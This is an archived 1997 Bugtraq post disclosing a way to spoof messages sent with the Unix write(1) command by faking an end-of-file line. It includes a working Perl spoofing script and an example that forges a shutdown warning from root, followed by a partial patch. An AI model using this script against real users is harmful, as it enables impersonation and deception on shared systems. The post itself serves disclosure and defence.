Bugtraq mailing list archives
write(1)
From: butafuco () MC NET (test)
Date: Wed, 21 May 1997 21:53:30 -0500
Program Effected: write(1) Impact: Mostly Harmless It is trivial to spoof a write from one user to the next locally on a system by faking an "EOF". This ofcourse does not effect users who have turned off their write permissions. It's also fairly noticeable by the lack of any beep. -------------------------------swrite----------------------------------------- #!/usr/contrib/bin/perl # (NO C) intellectual property is theft... butafuco () mc net if(@ARGV < 2) { print "\n Usage: swrite target from [tty]\n"; exit 0; } while (<STDIN>){ chop($line = $_); push @to_write, $line; } $oopsmessage = "oops... sorry :\)\n"; $wait = 30; $delay = 2; chop($host = `hostname`); $terminal = "console"; if(@ARGV > 2){ $terminal = $ARGV[2]; } open(JIM, "|write $ARGV[0]"); select(JIM); $| =1; sleep $delay; print(JIM $oopsmessage); print(JIM "EOF\n"); sleep $wait; chop($time = `date +%H:%M`); print(JIM "\nMessage from $ARGV[1]\@$host on $terminal at $time ...\n"); foreach $line (@to_write){ sleep $delay; print (JIM "$line\n"); } $| = 0; close(JIM); -------------------------------swrite---------------------------------------- example usage... Un*x % echo The System is going down IMMIDIATELY\! | ./swrite \ user root console If your an absolute paranoid, here are the diff's of an incomplete patch for write.c.. it's a start anyhow. 281c281,284 < while (fgets(line, sizeof(line), stdin) != NULL) ---
while (fgets(line, sizeof(line), stdin) != NULL){ if(!strcmp(line, "EOF\n")){ (void)strcpy(line, "EOF <-- Warning: Not End of File.\n"); }
282a286
}
It'll work for "EOF" just not for "EOF " or "EOF " etc...
Current thread:
- Re: SunOS exploit. Jeff Uphoff (May 19)
- Re: SunOS exploit. Trevor Linton (May 18)
- /dev/tcx0 crashes SunOS 4.1.4 on Sparc 20's Dixon Ly (May 19)
- Re: /dev/tcx0 crashes SunOS 4.1.4 on Sparc 20's Fabrice Planchon (May 20)
- Fun with devices [was: Re: /dev/tcx0 crashes SunOS 4.1.4 on Sparc Walter Hafner (May 21)
- write(1) test (May 21)
- Re: write(1) Jauder Ho (May 22)
- Re: Fun with devices [was: Re: /dev/tcx0 crashes SunOS 4.1.4 on Mike Scher (May 21)
- Re: Fun with devices [was: Re: /dev/tcx0 crashes SunOS 4.1.4 on Doug Hughes (May 22)
- /dev/tcx0 crashes SunOS 4.1.4 on Sparc 20's Dixon Ly (May 19)
- Re: SunOS exploit. Trevor Linton (May 18)
- Re: SunOS exploit. & DigitalUnix Joe Zbiciak (May 20)